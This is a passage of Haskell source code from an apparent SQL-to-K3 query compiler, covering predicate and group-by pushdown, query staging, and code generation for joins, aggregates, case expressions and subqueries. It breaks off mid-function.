process e@(InPredicate _ ine _ (InQueryExpr _ q)) = do
(invs, inbs) <- process ine
(qvs, qbs) <- bindSubquery e q
return (invs ++ qvs, inbs ++ qbs)
process (Cast _ e _) = process e
process (Extract _ _ e) = process e
process _ = return ([], [])
concatR (a,b) (c,d) = (nub $ a++c, b++d)
concatMany l = return $ (nub . concat) *** concat $ unzip l
processMany el = mapM process el >>= concatMany
bindSubquery e q = do
sym <- ssqsextM
qcl <- query q
vbl <- mapM (\path -> trypath sidOpt (return ([path], [])) (const $ return ([], [])) path) $ qcfree qcl
return (concat $ map fst vbl, [(e, ("__subquery" ++ show sym, qcl))])
caseList extra whens = do
rl <- (\a b -> a ++ [b]) <$> mapM (\(l,e) -> processMany $ l++[e]) whens <*> processMany extra
concatMany rl
predicatePushdown :: Maybe ScopeId -> ScalarExprList -> PlanTree -> SQLParseM (PlanTree, ScalarExprList)
predicatePushdown Nothing preds jtree = return (jtree, preds)
predicatePushdown (Just sid) preds jtree = foldM push (jtree, []) preds
where
push (t, remdr) p = do
rels <- baseRelationsE sid p
(nt, accs) <- onRelLCA t rels $ inject p
return (nt, if any id accs then remdr ++ [p] else remdr)
inject p _ n@(ttag -> PTable tid tsid trOpt bmOpt chains) = do
[np] <- rebaseExprs sid [tsid] [p]
(_, npqbs) <- varsAndQueries (Just tsid) [np]
return (replaceData n $ PTable tid tsid trOpt bmOpt $ pcextSelect sid npqbs np chains, False)
inject p [lrels, rrels] n@(Node (PJoin psid osid jt jeq jp jpb chains) [l,r]) = do
(lsid, rsid) <- (,) <$> treeSchema l <*> treeSchema r
[np] <- rebaseExprs sid [psid] [p]
sepE <- classifyConjunct sid lsid rsid lrels rrels np
(njeq, njp, nsubqbs) <- case sepE of
Left (lsep,rsep) -> do
(_, lqbs) <- varsAndQueries (Just lsid) [lsep]
(_, rqbs) <- varsAndQueries (Just rsid) [rsep]
return (jeq ++ [(lsep,rsep)], jp, lqbs ++ rqbs)
Right nonsep -> do
(_, rqbs) <- varsAndQueries (Just psid) [nonsep]
return (jeq, jp ++ [nonsep], rqbs)
return (replaceData n $ PJoin psid osid jt njeq njp (jpb ++ nsubqbs) chains, False)
inject _ _ n = return (n, True)
onRelLCA :: PlanTree -> [Identifier] -> ([[Identifier]] -> PlanTree -> SQLParseM (PlanTree, a)) -> SQLParseM (PlanTree, [a])
onRelLCA t rels f = do
(_,_,x,y) <- foldMapTree go (False, [], [], []) t
return (head x, y)
where
go (conc -> (True, _, nch, acc)) n = return (True, [], [replaceCh n nch], acc)
go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n@(ttag -> PTable (("__" ++) -> i) _ _ _ _)
| rels `intersect` (chrels ++ [i]) == rels = f relsByCh (replaceCh n nch) >>= \(n',r) -> return (True, [], [n'], acc++[r])
| otherwise = return (False, chrels++[i], [replaceCh n nch], acc)
go (conc -> (False, relsByCh@(concat -> chrels), nch, acc)) n
| rels `intersect` chrels == rels = f relsByCh (replaceCh n nch) >>= \(n', r) -> return (True, [], [n'], acc++[r])
| otherwise = return (False, chrels, [replaceCh n nch], acc)
go _ _ = throwE "onRelLCA pattern mismatch"
conc cl = (\(a,b,c,d) -> (any id a, b, concat c, concat d)) $ unzip4 cl
groupByPushdown :: PlanTree -> ScopeId -> SelectItemList -> SelectItemList -> SQLParseM (PlanTree, SelectItemList)
groupByPushdown jtree s g a = walk s g a jtree
where
walk sid gbs aggs e@(Node n ch) = do
let onRoot = n == ttag jtree
continue <- trace (boxToString $ ["GB walk"] %$ prettyLines e) $ trypush sid gbs aggs ch n
case continue of
Left doExtend -> complete onRoot doExtend aggs sid gbs aggs $ Node n ch
Right (doExtend, naggs, chsga) -> do
nch <- mapM (\((cs,cg,ca), c) -> walk cs cg ca c >>= return . fst) $ zip chsga ch
complete onRoot doExtend naggs sid gbs naggs $ Node n nch
trypush sid gbs aggs [lt,rt] n@(PJoin psid osid _ jeq jp _ chains)
| not $ null jeq = do
jptrs <- joinAttrs psid osid jeq jp chains
aptrs <- aggAttrs psid sid aggs
let caggs = chainAggregates osid chains
let overlaps = jptrs `intersect` aptrs
case (caggs, overlaps) of
([],[]) -> do
(lsid, rsid) <- (,) <$> treeSchema lt <*> treeSchema rt
(lgbs, rgbs, remgbs) <- localizeJoin lsid rsid psid sid gbs jptrs
(laggs, raggs, remaggs, naggs) <- decomposeAggregates lsid rsid psid sid aggs
if debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs remaggs naggs $ not (null remgbs && null remaggs)
then return $ Left True
else return $ Right (True, naggs, [(lsid, lgbs, laggs), (rsid, rgbs, raggs)])
(_,_) -> return $ Left $ null caggs
| otherwise = return $ Left $ null $ chainAggregates osid chains
trypush _ _ _ _ (PJoin _ _ _ _ _ _ _) = throwE "Invalid binary join node"
trypush _ _ _ ch n@(PTable _ tsid _ _ chains) = return $ Left $ null $ chainAggregates tsid chains
trypush _ _ _ ch n@(PSubquery _ _) = return $ Left True
debugAggDecomp psid osid lgbs rgbs remgbs laggs raggs naggs remaggs m =
trace (unwords ["Agg decomp", show psid, show osid
, "GBs:", show $ length lgbs, show $ length rgbs, show $ length remgbs
, "Aggs:", show $ length laggs, show $ length raggs, show $ length naggs, show $ length remaggs]) m
complete onRoot doExtend raggs sid gbs aggs (Node n ch) = do
n' <- refreshInputSchema n ch
n'' <- if not onRoot && doExtend then pcextGroupBy gbs aggs n' else return n'
trace (boxToString $ ["Completed"] %$ prettyLines (Node n'' ch)) $
return (Node n'' ch, if onRoot then raggs else [])
chainAggregates sid chains = concatMap snd $ pcAggExprs sid chains
joinAttrs dsid sid1 eqexprs neqexprs chains = do
eqptrs <- mapM (\(x,y) -> (++) <$> exprAttrs dsid x <*> exprAttrs dsid y) eqexprs >>= return . concat
neqptrs <- mapM (exprAttrs dsid) neqexprs >>= return . concat
let sidAndExprs = pcNonAggExprs sid1 chains
exprptrs <- concatMapM (\(ssid,el) -> concatMapM (exprAttrs ssid) el) sidAndExprs
rexprptrs <- rebaseAttrs dsid exprptrs
return $ nub $ eqptrs ++ neqptrs ++ rexprptrs
aggAttrs dsid ssid aggs = do
aggptrs <- concatMapM (exprAttrs ssid) $ projectionexprs aggs
rebaseAttrs dsid $ nub aggptrs
localizeJoin lsid rsid psid sid gbs jptrs = do
gbptrs <- concatMapM (exprAttrs sid) $ projectionexprs gbs
rgbptrs <- rebaseAttrs psid gbptrs
localizeAttrs lsid rsid psid $ rgbptrs ++ jptrs
localizeAttrs lsid rsid psid ptrs = do
nodes <- mapM sqglkupM $ nub $ ptrs
(lexprs, rexprs, rest) <- localizeInputExprs psid lsid rsid $ map (\n -> Identifier emptyAnnotation $ Nmc $ adnn n) nodes
return (map mkprojection lexprs, map mkprojection rexprs, rest)
decomposeAggregates lsid rsid psid sid aggs = do
(aggexprs, aggFns) <- aggregateexprs aggs
raggptrs <- mapM (\e -> exprAttrs sid e >>= rebaseAttrs psid) aggexprs
ragglocals <- mapM (localizeAttrs lsid rsid psid) raggptrs
foldM (decomposeAggByFn lsid rsid sid) ([], [], [], []) $ zip3 ragglocals (zip aggs aggexprs) aggFns
decomposeAggByFn lsid rsid sid (lacc, racc, acc, nacc) ((ldeps, rdeps, deps), (agg,e), fn) =
if null deps then do
(eagg, cagg, nagg) <- rewriteAgg sid (if null rdeps then lsid else rsid) fn agg e
let (nlacc, nracc) = if null rdeps then (lacc ++ [eagg], racc ++ [cagg]) else (lacc ++ [cagg], racc ++ [eagg])
return (nlacc, nracc, acc, nacc ++ [nagg])
else return (lacc, racc, acc ++ [e], nacc)
rewriteAgg ssid dsid aggFn agg e = do
ne <- rebaseExprs ssid [dsid] [e] >>= return . head
(ei, ci) <- (\a b -> ("__AGGD" ++ show a, "__AGGD" ++ show b)) <$> saggsextM <*> saggsextM
(,,) <$> mkaggregate aggFn (SelectItem emptyAnnotation e $ Nmc ei) ne
<*> mkaggregate AggCount (SelectItem emptyAnnotation e $ Nmc ci) (Star emptyAnnotation)
<*> mkaggregate aggFn agg (FunCall emptyAnnotation (Name emptyAnnotation [Nmc "*"])
[Identifier emptyAnnotation $ Nmc ei
,Identifier emptyAnnotation $ Nmc ci])
concatMapM f x = mapM f x >>= return . concat
sqlstage :: [SQLDecl] -> SQLParseM ([SQLDecl], StageGraph)
sqlstage stmts = mapM stage stmts >>= return . (concat *** concat) . unzip
where
stage s@(SQLRel _) = return ([s], [])
stage s@(SQLStage _) = throwE "SQLStage called with existing stage declarations"
stage (SQLQuery plan) = stagePlan plan >>= \(_,l,g) -> return (l,g)
stagePlan (QueryPlan tOpt chains stgOpt) = do
(ntOpt, (tstages, tstgg)) <- maybe (return (Nothing, ([], []))) (\t -> stageTree t >>= return . first Just) tOpt
(nplan, cstages, nstgg) <- stagePlanChains tstgg ntOpt stgOpt chains
return (nplan, tstages ++ cstages, nstgg)
stageTree jtree = (\((a,b),c) -> (c,(a,b))) <$> foldMapRebuildTree stageNode ([],[]) jtree
stageNode (aconcat -> (acc, [lstgg,rstgg])) ch n@(ttag -> PJoin psid osid jt jeq jp jpb chains) = do
stgid <- stgsextM >>= return . stageId . show
let (jchains, schains) = nonAggregatePrefix chains
let jtOpt = Just $ Node (PJoin psid osid jt jeq jp jpb jchains) ch
let jstage = SQLQuery $ QueryPlan jtOpt [] (Just stgid)
let nt = Node (PTable stgid osid Nothing Nothing []) []
let jstgg = stgEdges [lstgg, rstgg] stgid
(st, nstages, nstgg) <- stageNodeChains jstgg nt schains
let nstgg' = lstgg ++ rstgg ++ nstgg
kt <- k3ScopeType osid bmelem
return ((acc ++ [SQLStage (stgid, kt), jstage] ++ nstages, nstgg'), st)
stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PTable i tsid trOpt bmOpt chains) = do
let (tchains, schains) = nonAggregatePrefix chains
let nt = Node (PTable i tsid trOpt bmOpt tchains) ch
(st, nstages, nstgg) <- stageNodeChains [Left i] nt schains
return ((acc ++ nstages, concat stgg ++ nstgg), st)
stageNode (aconcat -> (acc, stgg)) ch n@(ttag -> PSubquery osid (QueryClosure fvs plan)) = do
(nplan, nstages, nstgg) <- stagePlan plan
return ((acc ++ nstages, concat stgg ++ nstgg), Node (PSubquery osid $ QueryClosure fvs nplan) ch)
stageNode _ _ n = throwE $ boxToString $ ["Invalid tree node for staging"] %$ prettyLines n
stagePlanChains stgg Nothing stgOpt chains = return (QueryPlan Nothing chains stgOpt, [], stgg)
stagePlanChains stgg (Just t) stgOpt chains = do
let (pchains, schains) = nonAggregatePrefix chains
nt <- foldM (flip pcext) t pchains
(st, nstages, nstgg) <- stageNodeChains stgg nt schains
return (QueryPlan (Just st) [] stgOpt, nstages, nstgg)
stageNodeChains stgg t chains = foldM onPath (t,[],stgg) chains
where onPath (t, acc, stggacc) p = do
pt <- pcext p t
if isNonAggregatePath p
then return (pt, acc, stggacc)
else do
stgid <- stgsextM >>= return . stageId . show
let pstage = SQLQuery $ QueryPlan (Just pt) [] (Just stgid)
osid <- treeSchema pt
bm <- treeBindingMap pt
kt <- k3ScopeType osid bm
rkt <- if not $ isAggregatePath p
then return kt
else do
et <- telemM kt
case tnc et of
(TRecord ids, ch) -> zeroT $ zip ids ch
_ -> throwE "Invalid k3 aggregate plan type"
let nt = Node (PTable stgid osid Nothing (Just bm) []) []
let nstgg = stggacc ++ stgEdges [stggacc] stgid
return (nt, acc ++ [SQLStage (stgid, rkt), pstage], nstgg)
stgEdges ll i = map (Right . (,i)) $ catMaybes $ stgCh ll
stgCh ll = map (\l -> if null l then Nothing else Just $ either id snd $ last l) ll
nonAggregatePrefix chains = fst $ foldl accum (([],[]), False) chains
where accum ((nagg,agg), found) p | not found && isNonAggregatePath p = ((nagg ++ [p], agg), False)
| otherwise = ((nagg, agg++[p]), True)
aconcat = (concat *** id) . unzip
sqlcodegen :: Bool -> ([SQLDecl], StageGraph) -> SQLParseM (K3 Declaration)
sqlcodegen distributed (stmts, stgg) = do
(decls, inits) <- foldM cgstmt ([], []) stmts
initDecl <- mkInit decls
return $ DC.role "__global" $ [master] ++ decls ++ mkPeerInit inits ++ initDecl
where
trig i = i ++ "_trigger"
(leaves, edges) = partitionEithers stgg
stagechildren = foldl (\acc (s,t) -> Map.insertWith (++) t [s] acc) Map.empty edges
stageinits = Map.foldlWithKey (\acc p ch -> if ch `intersect` leaves == ch then acc ++ [p] else acc) [] stagechildren
cgstmt (dacc, iacc) (SQLRel (i, t)) = do
gt <- twrapcolelemM t
(ldecls, linit) <- mkLoader (i,t)
return (dacc ++ [DC.global i gt Nothing] ++ ldecls, iacc ++ [linit])
cgstmt (dacc, iacc) (SQLStage (i, t)) = return (dacc ++ [DC.global i (mutT t) Nothing], iacc)
cgstmt (dacc, iacc) (SQLQuery plan) = do
(e,sid,bm,merge) <- cgplan plan
t <- k3PlanType bm plan
(outid, trigid, decls) <- case qstageid plan of
Just i -> return (i, trig i, [])
Nothing -> do
s <- stgsextM >>= return . show
let i = materializeId s
return (i, stageId s, [DC.global i (mutT t) Nothing])
let execStageF i e = case lookup i edges of
Nothing -> return e
Just next ->
let nextE = EC.send (EC.variable $ trig next) (EC.variable "me") EC.unit
execE = EC.block [e, nextE]
in annotateTriggerBody i plan merge execE
trigBodyE <- execStageF outid $ EC.assign outid e
return (dacc ++ decls ++ [ DC.trigger trigid TC.unit $ EC.lambda "_" trigBodyE ], iacc)
cgclosure (QueryClosure free plan)
| null free = cgplan plan
| otherwise = throwE "Code generation not supported for correlated queries"
cgplan (QueryPlan tOpt chains _) = do
esbmOpt <- maybe (return Nothing) (\t -> cgtree t >>= return . Just) tOpt
cgchains esbmOpt chains
cgtree n@(Node (PJoin psid osid jtOpt jeq jp jsubqbs chains) [l,r]) = do
sf@(_,_,[[lqual],[rqual]]) <- sqclkupM psid
cqaenv <- partitionCommonQualifedAttrEnv sf
(lexpr, lsid, lbm, _) <- cgtree l
(rexpr, rsid, rbm, _) <- cgtree r
(li, ri) <- (,) <$> uniqueScopeQualifier lsid <*> uniqueScopeQualifier rsid
jbm <- bindingMap [(lqual, Map.lookup [lqual] cqaenv, lbm), (rqual, Map.lookup [rqual] cqaenv, rbm)]
case (jeq, jp) of
((_:_), []) -> do
let (lexprs, rexprs) = unzip jeq
lkbodyE <- mapM (cgexpr jsubqbs Nothing lsid) lexprs >>= \es -> bindE lsid lbm (Just li) $ tupE es
rkbodyE <- mapM (cgexpr jsubqbs Nothing rsid) rexprs >>= \es -> bindE rsid rbm (Just ri) $ tupE es
obodyE <- concatE psid jbm Nothing
let lkeyE = EC.lambda lqual lkbodyE
let rkeyE = EC.lambda rqual rkbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "equijoin_kv" else "equijoin") lexpr) [rexpr, lkeyE, rkeyE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
(_, _) -> do
mbodyE <- case jp of
[] -> bindE psid jbm Nothing $ EC.constant $ CBool True
(h:t) -> cgexpr jsubqbs Nothing psid h >>= \he -> foldM (cgconjunct jsubqbs psid) he t >>= \e -> bindE psid jbm Nothing e
obodyE <- concatE psid jbm Nothing
let matchE = EC.lambda lqual $ EC.lambda rqual mbodyE
let outE = EC.lambda lqual $ EC.lambda rqual obodyE
joinKV <- isKVBindingMap rbm
let joinE = EC.applyMany (EC.project (if joinKV then "join_kv" else "join") lexpr) [rexpr, matchE, outE]
cgchains (Just (joinE, osid, bmelem, Nothing)) chains
cgtree (Node (PSubquery _ qcl) ch) = cgclosure qcl
cgtree n@(Node (PTable i tsid _ bmOpt chains) []) = cgchains (Just (EC.variable i, tsid, maybe bmelem id bmOpt, Nothing)) chains
cgtree _ = throwE "Invalid plan tree"
cgchains esbmOpt chains = do
resbmOpt <- foldM cgchain esbmOpt chains
maybe (throwE "Invalid chain result") return resbmOpt
cgchain (Just (e,sid,bm,_)) (PlanCPath osid selects gbs prjs aggs having subqbs) = do
fe <- case selects of
[] -> return e
l -> foldM (filterChainE sid bm subqbs) e l
case (gbs, prjs, aggs, having) of
([], [], [], Nothing) -> return $ Just (fe, osid, bm, Nothing)
([], _, _, Nothing) -> cgselectlist sid osid bm subqbs fe prjs aggs
(h:t, _, _, _) -> cggroupby sid osid bm subqbs fe gbs prjs aggs having
_ -> throwE $ "Invalid group-by and having expression pair"
cgchain Nothing (PlanCPath osid [] [] prjs [] Nothing []) = cglitselectlist [] osid prjs
cgchain Nothing _ = throwE "Invalid scalar chain component"
cggroupby sid osid bm subqbs e gbs prjs aggs having = do
i <- uniqueScopeQualifier sid
o <- uniqueScopeQualifier osid
gbie <- (\f -> foldM f (0,[]) gbs >>= return . snd) $ \(i,acc) gbe -> do
gbke <- cgexpr subqbs Nothing sid gbe
case gbe of
(Identifier _ (Nmc n)) -> return (i, acc++[(n,gbke)])
_ -> return (i+1, acc++[("f" ++ show i, gbke)])
gbbodyE <- bindE sid bm (Just i) $ case gbie of
[] -> EC.unit
[(_,e)] -> e
_ -> recE gbie
let groupF = EC.lambda i gbbodyE
(prjsymidx, prjie) <- cgprojections subqbs 0 sid prjs
prjt <- mapM (scalarexprType $ Just sid) $ projectionexprs prjs
unless (all (\((_,a), (_,b)) -> compareEAST a b) $ zip prjie gbie) $ throwE "Mismatched groupbys and projections"
(_, aggie, mergeie) <- cgaggregates subqbs prjsymidx sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggie of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggie
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
aggt <- mapM (aggregateType $ Just sid) $ projectionexprs aggs
let aggit = zip (map fst aggie) aggt
zE <- zeroE aggit
let rE = EC.applyMany (EC.project "group_by" e) [groupF, aggF, zE]
let prefixTypePath i pfx l = case l of
[] -> (i+1, [("f" ++ show i, [pfx])])
[j] -> (i, [(j, [pfx])])
_ -> (i, map (\j -> (j, [pfx, j])) l)
let (nidx, keyPaths) = prefixTypePath (0::Int) "key" $ map fst prjie
let (_, valPaths) = prefixTypePath nidx "value" $ map fst aggie
let rbm = BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
hve <- maybe (return Nothing) (havingE aggie osid rbm o) having
let hrE = maybe rE (\h -> EC.applyMany (EC.project "filter" rE) [EC.lambda o h]) hve
return $ Just (hrE, osid, rbm, Just mergeF)
where havingE aggie osid rbm o e = do
let aggei = map (\(a,b) -> (b,a)) aggie
he <- cgexpr subqbs (Just $ subAgg aggei) osid e
hbodyE <- bindE osid rbm (Just o) $ he
return $ Just hbodyE
subAgg aggei e = do
case lookup e aggei of
Nothing -> return e
Just i -> return $ EC.variable i
cgselectlist sid osid bm subqbs e prjs aggs = case (prjs, aggs) of
(p, []) -> do
i <- uniqueScopeQualifier sid
mbodyE <- cgprojections subqbs 0 sid prjs >>= \(_, fields) -> bindE sid bm (Just i) $ recE fields
let prjE = EC.applyMany (EC.project "map" e) [EC.lambda i mbodyE]
return $ Just (prjE, osid, bmelem, Nothing)
([], a) -> do
i <- uniqueScopeQualifier sid
(_, aggfields, mergeie) <- cgaggregates subqbs 0 sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggfields of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggfields
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
rElemT <- scopeType osid >>= telemM
zE <- case tnc rElemT of
(TRecord ids, ch) -> zeroE $ zip ids ch
_ -> throwE "Invalid aggregate result type"
let rexpr = EC.applyMany (EC.project "fold" e) [aggF, zE]
return $ Just (rexpr, osid, BMNone, Just mergeF)
_ -> throwE $ "Invalid mutually exclusive projection-aggregate combination"
TODO : we should not pass down here , or state assumption that is not used .
cglitselectlist subqbs sid prjs = cgprojections subqbs 0 sid prjs >>= \(_, ide) -> return $ Just (recE ide, sid, BMNone, Nothing)
cgprojections subqbs i sid l = foldM (cgprojection subqbs sid) (i, []) l
cgprojection subqbs sid (i, acc) si = do
(ni, n) <- selectItemId i si
cgaccprojection subqbs sid acc ni n $ projectionexpr si
cgaccprojection subqbs sid acc i n e = cgexpr subqbs Nothing sid e >>= \rE -> return (i, acc ++ [(n, rE)])
cgaggregates subqbs i sid l = foldM (cgaggregate subqbs sid) (i, [], []) l
cgaggregate subqbs sid (i, eacc, mrgacc) si = do
(ni, n) <- selectItemId i si
cgaccaggregate subqbs sid eacc mrgacc ni n si
cgaccaggregate subqbs sid eacc mrgacc i n si =
cgaggexpr subqbs sid si >>= \(rE, mergeE) -> return (i, eacc ++ [(n, rE)], mrgacc ++ [(n, mergeE)])
cgconjunct subqbs sid eacc e = cgexpr subqbs Nothing sid e >>= \e' -> return $ EC.binop OAnd eacc e'
cgaggexpr subqbs sid si = do
(e, aggFn) <- aggregateexpr si
aE <- cgexpr subqbs Nothing sid e
return $ case aggFn of
AggSum -> (binagg OAdd aE, mergeagg OAdd)
AggCount -> (binagg OAdd $ EC.constant $ CInt 1, mergeagg OAdd)
AggMin -> (binapp "min" aE, mergeapp "min")
AggMax -> (binapp "max" aE, mergeapp "max")
where binagg op e = EC.lambda "aggacc" $ EC.binop op (EC.variable "aggacc") e
binapp f e = EC.lambda "aggacc" $ EC.applyMany (EC.variable f) [EC.variable "aggacc", e]
mergeagg op = EC.lambda "a" $ EC.lambda "b" $ EC.binop op (EC.variable "a") $ EC.variable "b"
mergeapp f = EC.lambda "a" $ EC.lambda "b" $ EC.applyMany (EC.variable f) [EC.variable "a", EC.variable "b"]
-- TODO: case, correlated subqueries, more type constructors
TODO : Cast , Interval , LiftOperator , NullLit , Placeholder , PositionalArg , WindowFn
cgexpr _ _ _ (BooleanLit _ b) = return $ EC.constant $ CBool b
cgexpr _ _ _ (NumberLit _ i) = return $ if "." `isInfixOf` i
then EC.constant $ CReal $ read i
else EC.constant $ CInt $ read i
cgexpr _ _ _ (StringLit _ s) = return $ EC.constant $ CString s
cgexpr _ _ _ (TypedStringLit _ tn s) = do
t <- sqlnamedtype tn
case (tag t, find isTProperty $ annotations t) of
(TInt, Just (TProperty (tPropertyName -> "TPCHDate"))) -> return $ EC.constant $ CInt $ read $ filter (/= '-') s
(_, _) -> throwE $ boxToString $ ["Unsupported constructor for"] %$ prettyLines t
cgexpr _ _ _ (Identifier _ (sqlnmcomponent -> i)) = return $ EC.variable i
cgexpr _ _ sid (QIdentifier _ nmcl) = do
ptr <- sqcflkupM sid $ sqlnmpath nmcl
EC.variable . adnn <$> sqglkupM ptr
cgexpr subqbs f sid (Case _ whens elseexpr) = cgcase subqbs f sid elseexpr whens
cgexpr subqbs f sid (CaseSimple _ expr whens elseexpr) = cgcasesimple subqbs f sid expr elseexpr whens
cgexpr subqbs f sid e@(FunCall _ nm args) = do
isAgg <- isAggregate e
if isAgg then do
(agge,_) <- cgaggexpr subqbs sid (SelExp emptyAnnotation e)
maybe err ($ agge) f
else do
let fn = sqlnm nm
case sqloperator fn args of
(Just (UnaryOp o x)) -> EC.unop o <$> cgexpr subqbs f sid x
(Just (BinaryOp o x y)) -> EC.binop o <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y
_ -> do
case (fn, args) of
("!between", [x,y,z]) ->
let cg a b c = EC.binop OAnd (EC.binop OLeq b a) $ EC.binop OLeq a c
in cg <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y <*> cgexpr subqbs f sid z
TODO
("!like", [_,_]) -> throwE $ "LIKE operator not yet implemented"
("!notlike", [_,_]) -> throwE $ "NOTLIKE operator not yet implemented"
(_, _) -> EC.applyMany (EC.variable fn) <$> mapM (cgexpr subqbs f sid) args
where err = throwE "Invalid aggregate expression in cgexpr"
cgexpr _ _ sid (Star _) = do
(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
recE <$> mapM (\p -> singletonPath p >>= \j -> return (j, EC.variable j)) ord
cgexpr _ _ sid (QStar _ (sqlnmcomponent -> i)) = do
qattrs <- sqclkupM sid >>= qualifiedAttrs [i] >>= attrIds
recE <$> mapM (\j -> return (j, EC.variable j)) qattrs
cgexpr subqbs _ _ e@(Exists _ _) = do
(subexpr, _, _) <- cgsubquery subqbs e
emptyE False subexpr
cgexpr subqbs _ _ e@(ScalarSubQuery _ _) = cgsubquery subqbs e >>= \(r,_,_) -> return r
cgexpr subqbs f sid (InPredicate _ ine isIn (InList _ el)) = do
testexpr <- cgexpr subqbs f sid ine
valexprs <- mapM (cgexpr subqbs f sid) el
case valexprs of
[] -> return $ EC.constant $ CBool $ not isIn
(h:t) -> memoE (immutE $ testexpr) $
\vare -> return $ foldl (\accE vale -> mergeE accE $ testE vare vale) (testE vare h) t
where testE vare vale = EC.binop (if isIn then OEqu else ONeq) vare vale
mergeE acce nexte = EC.binop (if isIn then OOr else OAnd) acce nexte
cgexpr subqbs f sid e@(InPredicate _ ine isIn (InQueryExpr _ _)) = do
testexpr <- cgexpr subqbs f sid ine
(subexpr, osid, bm) <- cgsubquery subqbs e
memberE isIn osid bm testexpr subexpr
cgexpr _ _ _ e = throwE $ "Unhandled expression in codegen: " ++ show e
-- Case-statement generation.
cgcase _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcase"
cgcase subqbs f sid elseexpr whens@((_,e):_) = do
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebranch subqbs f sid) elseE whens
cgcasesimple _ _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcasesimple"
cgcasesimple subqbs f sid expr elseexpr whens@((_, e):_) = do
valE <- cgexpr subqbs f sid expr
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebrancheq subqbs f sid valE) elseE whens
cgcasebranch subqbs f sid elseE (l,e) = do
predE <- case l of
[] -> throwE "Invalid case-branch-list"
[x] -> cgexpr subqbs Nothing sid x
h:t -> cgexpr subqbs Nothing sid h >>= \hE -> foldM (cgconjunct subqbs sid) hE t
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse predE thenE elseE
cgcasebrancheq subqbs f sid valE elseE (l,e) = do
testValE <- case l of
[x] -> cgexpr subqbs Nothing sid x
_ -> throwE "Invalid case-branch-eq-list"
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse (EC.binop OEqu valE testValE) thenE elseE
-- Subqueries
cgsubquery subqbs e =
case lookup e subqbs of
Nothing -> throwE $ "Found a subquery without a binding: " ++ show e
Just (_, qcl) -> cgclosure qcl >>= \(r, osid, bm, _) -> return (r, osid, bm)
bindingMap l = foldM qualifyBindings (BMTVPartition Map.empty) l
qualifyBindings (BMTVPartition acc) (qual, Just aenv, bm) = do
f <- case bm of
BMNone -> return $ commonNoneBinding qual
BMTPrefix i -> return $ commonPrefixBinding qual i
BMTFieldMap fb -> return $ commonFieldBinding qual fb
_ -> throwE "Cannot qualify partitioned bindings"
return $ BMTVPartition $ Map.foldlWithKey f acc aenv
qualifyBindings _ _ = throwE "Cannot qualify partitioned bindings"
commonNoneBinding qual acc path _ = case path of
[i] -> Map.insert i (qual, Nothing) acc
_ -> acc
commonPrefixBinding qual pfx acc path _ = case path of
[i] -> Map.insert i (qual, Just $ Left pfx) acc
_ -> acc
commonFieldBinding qual fb acc path _ = case path of
[i] -> maybe acc (\typePath -> Map.insert i (qual, Just $ Right typePath) acc) $ Map.lookup i fb
_ -> acc
filterChainE :: ScopeId -> BindingMap -> SubqueryBindings -> K3 Expression -> ScalarExpr -> SQLParseM (K3 Expression)
filterChainE sid bm subqbs eacc e = do
i <- uniqueScopeQualifier sid
filterE <- cgexpr subqbs Nothing sid e
bodyE <- bindE sid bm (Just i) filterE
return $ EC.applyMany (EC.project "filter" eacc) [EC.lambda i bodyE]
annotateTriggerBody i (QueryPlan tOpt chains _) mergeOpt e = do
if distributed
then case tOpt of
Just (isEquiJoin -> True) ->
return $ e @+ (EApplyGen True "DistributedHashJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (isJoin -> True) ->
return $ e @+ (EApplyGen True "BroadcastJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (treeChains -> Just chains) | not (null chains) && isGroupByAggregatePath (last chains) ->
case mergeOpt of
Just mergeF -> return $ e @+ (EApplyGen True "DistributedGroupBy2"
$ Map.fromList [("lbl", SLabel i), ("merge", SExpr mergeF)])
Nothing -> throwE "No merge function found for group-by stage"
_ -> return e
else maybe (return e) (const $ joinBarrier e) $ Map.lookup i stagechildren
joinBarrier e = mkCountBarrier e $ EC.constant $ CInt 2
mkCountBarrier e countE = do
args <- barrierArgs countE
return $ e @+ EApplyGen True "OnCounter" args
barrierArgs countE = do
lblsym <- slblsextM
return $ Map.fromList [ ("id", SLabel $ "barrier" ++ show lblsym)
, ("eq", SExpr $ countE)
, ("reset", SExpr $ EC.constant $ CBool False)
, ("profile", SExpr $ EC.constant $ CBool False) ]
master = DC.global "master" (immutT TC.address) Nothing
mkLoader (i,t) = do
dt <- twrapcolelemM t
let pathCT = (TC.collection $ recT [("path", TC.string)]) @+ TAnnotation "Collection"
let rexpr = EC.applyMany (EC.variable $ i ++ "LoaderE") [EC.variable $ i ++ "Files", EC.variable i]
return $
